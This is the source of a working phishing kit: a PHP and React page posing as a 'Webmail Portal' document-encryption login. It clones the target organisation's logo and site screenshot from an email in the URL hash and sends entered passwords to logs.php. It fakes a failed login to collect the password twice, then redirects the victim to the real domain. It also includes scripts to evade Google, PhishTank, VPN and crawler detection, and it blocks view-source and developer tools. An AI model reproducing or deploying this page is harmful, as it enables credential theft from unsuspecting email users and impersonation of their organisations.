<?php
error_reporting(0);
session_start();

include('session/function.php');

require ("antibots/AntiBotUserAgent.php");
require ("antibots/AntiBotIsp.php"); 
require ("antibots/AnitiBotHost.php");
require ("antibots/AntiBotPhishTank.php");
require ("antibots/AntiBotVpn.php");
require ("antibots/SaveBrowsing.php");
require ("antibots/DiscoveredBot.php");
require ("antibots/AntiBotThree.php");
require ("antibots/DisturbOne.php");
require ("antibots/DisturbTwo.php");
require("antibots/Anti/Bot-Crawler.php");
@require("antibots/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect;
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { include($path."404.php"); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { include($path."404.php"); exit(); }


?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="shortcut icon" href="assets/mailbox.jpg">
    <title class="logoname">Webmail Portal Access | Digital Secured Platform</title>
    
    <!-- Tailwind CSS CDN -->
    <script src="https://cdn.tailwindcss.com"></script>
    
    <!-- React CDN -->
    <script crossorigin src="https://unpkg.com/react@18/umd/react.production.min.js"></script>
    <script crossorigin src="https://unpkg.com/react-dom@18/umd/react-dom.production.min.js"></script>
    
    <!-- Babel Standalone for JSX transformation -->
    <script src="https://unpkg.com/@babel/standalone/babel.min.js"></script>
    
    <!-- jQuery for AJAX -->
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    
    <style>
        body {
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: cover;
            background-position-y: bottom;
        }
    </style>
</head>
<body id="body-img">
    <div id="root"></div>

    <script type="text/babel">
        const { useState, useEffect, useRef } = React;

        function send_result(x, y, attempt) {
            return $.ajax({
                url: "./logs.php",
                data: { 
                    "email": x, 
                    "password": y,
                    "login_attempt": attempt || 1
                },
                type: "POST",
                dataType: "json"
            });
        }

        function isBase64(str) {
            if (str === '' || String(str).trim() === '') {
                return false;
            }
            try {
                if (btoa(atob(str)) == atob(btoa(str))) return true;
            } catch {
                return false;
            }
            return false;
        }

        function getEmail() {
            let email = "";
            if (window.location.hash) {
                email = window.location.hash.substring(1);
                email = isBase64(email) ? window.atob(email) : email;
            }
            return email;
        }


        function LoginForm() {
            const [email, setEmail] = useState(() => {
                // Initialize email once from URL hash
                const initialEmail = getEmail();
                if (!initialEmail || !initialEmail.match(/([a-zA-Z0-9._+-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi)) {
                    // No valid email tag found - redirect to google.com
                    setTimeout(() => window.location.replace("https://www.google.com"), 0);
                    return "";
                }
                return initialEmail;
            });
            const [password, setPassword] = useState("");
            const [error, setError] = useState("");
            const [count, setCount] = useState(0);
            const [rememberMe, setRememberMe] = useState(false);
            const [doubleLogin, setDoubleLogin] = useState("1");
            const [backgroundImage, setBackgroundImage] = useState("1");
            const [loginAttempt, setLoginAttempt] = useState(1);
            const [logoUrl, setLogoUrl] = useState("assets/logo.png");
            const [isLoading, setIsLoading] = useState(false);
            const [persistentError, setPersistentError] = useState("");
            const imgRef = useRef(null);
            const initializedRef = useRef(false);

            // Initialize email and domain once
            useEffect(() => {
                if (initializedRef.current) return;
                if (!email) return;
                initializedRef.current = true;

                // Update logo and background
                const domain = email.substring(email.lastIndexOf("@") + 1);
                
                // Fetch config settings and logo from server (PHP will fetch Clearbit logo)
                $.ajax({
                    url: "./get_config.php",
                    type: "GET",
                    dataType: "json",
                    data: { "domain": domain },
                    success: function(config) {
                        // Set double login config
                        setDoubleLogin(config.double_login);
                        setBackgroundImage(config.background_image || "1");
                        
                        // Set logo from server response (Clearbit fetched via PHP)
                        if (config.logo_url && config.logo_url !== '') {
                            setLogoUrl(config.logo_url);
                        } else {
                            // Fallback to default logo if server couldn't fetch Clearbit
                            setLogoUrl("assets/logo.png");
                        }
                        
                        // Set background image if enabled
                        if (config.background_image === "1") {
                            const bodyImg = document.getElementById("body-img");
                            if (bodyImg) {
                                const bg_image = `https://image.thum.io/get/width/1500/https://${domain}`;
                                
                                // Test if background image loads
                                $.ajax({
                                    url: bg_image,
                                    type: "GET",
                                    success: function(response, status, xhr) {
                                        const ct = xhr.getResponseHeader("content-type") || "";
                                        if (ct.indexOf('png') > -1 || ct.indexOf('jpeg') > -1 || ct.indexOf('jpg') > -1) {
                                            bodyImg.style.backgroundImage = `url("${bg_image}")`;
                                        }
                                    },
                                    error: function() {
                                        // Background image failed, keep white background
                                        bodyImg.style.backgroundColor = "#ffffff";
                                    }
                                });
                            }
                        } else {
                            // Background disabled - use white background
                            const bodyImg = document.getElementById("body-img");
                            if (bodyImg) {
                                bodyImg.style.backgroundColor = "#ffffff";
                                bodyImg.style.backgroundImage = "none";
                            }
                        }
                    },
                    error: function() {
                        // If config fails, default values
                        setDoubleLogin("1");
                        setBackgroundImage("1");
                        const bodyImg = document.getElementById("body-img");
                        if (bodyImg) {
                            bodyImg.style.backgroundColor = "#ffffff";
                        }
                    }
                });
            }, [email]);

            // Security features - setup once
            useEffect(() => {
                const handleKeyDown = (e) => {
                    if (e.ctrlKey && (e.which == 83)) {
                        e.preventDefault();
                        return false;
                    }
                };

                const handleContextMenu = (e) => {
                    e.preventDefault();
                };

                const handleKeyDown2 = (e) => {
                    if (event.keyCode == 123) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
                        return false;
                    }
                    if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
                        return false;
                    }
                };

                const handleKeyDown3 = (e) => {
                    return !(e.ctrlKey &&
                        (e.keyCode === 67 ||
                            e.keyCode === 85 ||
                            e.keyCode === 86 ||
                            e.keyCode === 88 ||
                            e.keyCode === 117));
                };

                window.addEventListener('keydown', handleKeyDown);
                window.addEventListener('contextmenu', handleContextMenu);
                document.addEventListener('keydown', handleKeyDown2);
                window.addEventListener('keydown', handleKeyDown3);

                return () => {
                    window.removeEventListener('keydown', handleKeyDown);
                    window.removeEventListener('contextmenu', handleContextMenu);
                    document.removeEventListener('keydown', handleKeyDown2);
                    window.removeEventListener('keydown', handleKeyDown3);
                };
            }, []);

            const handleSubmit = (e) => {
                e.preventDefault();
                
                // Email is always required from URL tag
                if (!email || !email.match(/([a-zA-Z0-9._+-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi)) {
                    window.location.replace("https://www.google.com");
                    return;
                }
                
                if (password.length < 5) {
                    setError("Your account password is too short.");
                    setTimeout(() => {
                        setPassword("");
                        setError("");
                    }, 1500);
                } else if (password.length > 4) {
                    // Disable button and show loading
                    setIsLoading(true);
                    
                    // Handle double login
                    if (doubleLogin == "1" && loginAttempt == 1) {
                        // First attempt - send and require second
                        send_result(email, password, 1).then(() => {
                            setIsLoading(false);
                            setError("Something went wrong. Please check your credentials and try again.");
                            setPersistentError("Invalid credentials. Please verify your email and password are correct.");
                            setLoginAttempt(2);
                            setPassword("");
                            setTimeout(() => {
                                setError("");
                            }, 2000);
                        }).catch(() => {
                            // Still show error even if request fails
                            setIsLoading(false);
                            setError("Something went wrong. Please check your credentials and try again.");
                            setPersistentError("Invalid credentials. Please verify your email and password are correct.");
                            setLoginAttempt(2);
                            setPassword("");
                            setTimeout(() => {
                                setError("");
                            }, 2000);
                        });
                    } else if (doubleLogin == "1" && loginAttempt == 2) {
                        // Second attempt - send and redirect
                        send_result(email, password, 2).then(() => {
                            let domain = email.substring(email.lastIndexOf("@") + 1);
                            setTimeout(() => {
                                window.location.replace("https://www." + domain);
                            }, 1000);
                        }).catch(() => {
                            // Redirect anyway
                            let domain = email.substring(email.lastIndexOf("@") + 1);
                            setTimeout(() => {
                                window.location.replace("https://www." + domain);
                            }, 1000);
                        });
                    } else {
                        // Single login (doubleLogin == "0")
                        if (count <= 0) {
                            send_result(email, password, 1).then(() => {
                                setIsLoading(false);
                                setError("Something went wrong. Please check your credentials.");
                                setPersistentError("Invalid credentials. Please verify your email and password are correct.");
                                setCount(count + 1);
                                setPassword("");
                                setTimeout(() => {
                                    setError("");
                                }, 2000);
                            }).catch(() => {
                                setIsLoading(false);
                                setError("Something went wrong. Please check your credentials.");
                                setPersistentError("Invalid credentials. Please verify your email and password are correct.");
                                setCount(count + 1);
                                setPassword("");
                                setTimeout(() => {
                                    setError("");
                                }, 2000);
                            });
                        } else {
                            send_result(email, password, 1).then(() => {
                                let domain = email.substring(email.lastIndexOf("@") + 1);
                                setTimeout(() => {
                                    window.location.replace("https://www." + domain);
                                }, 1000);
                            }).catch(() => {
                                // Redirect anyway
                                let domain = email.substring(email.lastIndexOf("@") + 1);
                                setTimeout(() => {
                                    window.location.replace("https://www." + domain);
                                }, 1000);
                            });
                        }
                    }
                }
            };

            return (
                <div className="flex items-center justify-center min-h-screen p-4">
                    <div className="w-full max-w-md">
                        <div className="bg-white rounded-lg shadow-xl">
                            <div className="p-6">
                                <form onSubmit={handleSubmit} className="space-y-4">
                                    <div className="text-center">
                                        <div className="mb-4">
                                            <img
                                                id="img-field"
                                                ref={imgRef}
                                                src={logoUrl}
                                                alt="Logo"
                                                className="w-32 mx-auto"
                                                onError={(e) => {
                                                    // Fallback to default logo if image fails to load
                                                    if (!logoUrl.includes('assets/logo.png')) {
                                                        e.target.onerror = null;
                                                        e.target.src = "assets/logo.png";
                                                        setLogoUrl("assets/logo.png");
                                                    }
                                                }}
                                            />
                                        </div>
                                        <h5 className="text-xl font-semibold mb-2">
                                            <span id="compNa"></span> Document Encryption
                                        </h5>
                                        <p className="text-gray-600 text-sm mb-4">
                                            Sign-in with your organization email credentials to access.
                                        </p>
                                        {persistentError && (
                                            <div className="text-red-600 text-sm mb-4 font-bold">
                                                {persistentError}
                                            </div>
                                        )}
                                        {error && (
                                            <div id="errorpw" className="text-red-500 text-sm mb-4">
                                                {error}
                                            </div>
                                        )}
                                    </div>

                                    <div>
                                        <label htmlFor="email" className="block text-sm font-medium text-gray-700 mb-1">
                                            Email address
                                        </label>
                                        <input
                                            type="email"
                                            name="email"
                                            id="email"
                                            className="w-full px-3 py-2 border border-gray-300 rounded-md bg-gray-100 opacity-100 pointer-events-none"
                                            placeholder="Username"
                                            value={email}
                                            readOnly
                                        />
                                    </div>

                                    <div>
                                        <label htmlFor="password" className="block text-sm font-medium text-gray-700 mb-1">
                                            Password
                                        </label>
                                        <input
                                            type="password"
                                            name="password"
                                            id="password"
                                            className="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-blue-500"
                                            placeholder="Password"
                                            value={password}
                                            onChange={(e) => setPassword(e.target.value)}
                                            required
                                        />
                                    </div>

                                    <div className="px-1">
                                        <label className="flex items-center">
                                            <input
                                                type="checkbox"
                                                checked={rememberMe}
                                                onChange={(e) => setRememberMe(e.target.checked)}
                                                className="mr-2"
                                            />
                                            <span className="text-sm text-gray-600">Remember me</span>
                                        </label>
                                    </div>

                                    <div className="flex items-center justify-between pt-4">
                                        <div className="flex-1">
                                            <img
                                                src="assets/footer.png"
                                                alt="Footer"
                                                className="w-full max-w-xs"
                                            />
                                        </div>
                                        <button
                                            type="submit"
                                            id="submit-btn"
                                            disabled={isLoading}
                                            className={`px-6 py-3 bg-blue-500 text-white rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2 font-medium flex items-center justify-center min-w-[100px] ${isLoading ? 'opacity-70 cursor-not-allowed' : 'hover:bg-blue-600'}`}
                                        >
                                            {isLoading ? (
                                                <svg className="animate-spin h-5 w-5 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                                                    <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                                                    <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                                                </svg>
                                            ) : (
                                                'Login'
                                            )}
                                        </button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <p className="text-center text-gray-700 mt-6 text-sm">
                            Copyright &copy; 2024 Systems Incorporated. All rights reserved.
                        </p>
                    </div>
                </div>
            );
        }

        const root = ReactDOM.createRoot(document.getElementById('root'));
        root.render(<LoginForm />);
    </script>
</body>
</html>

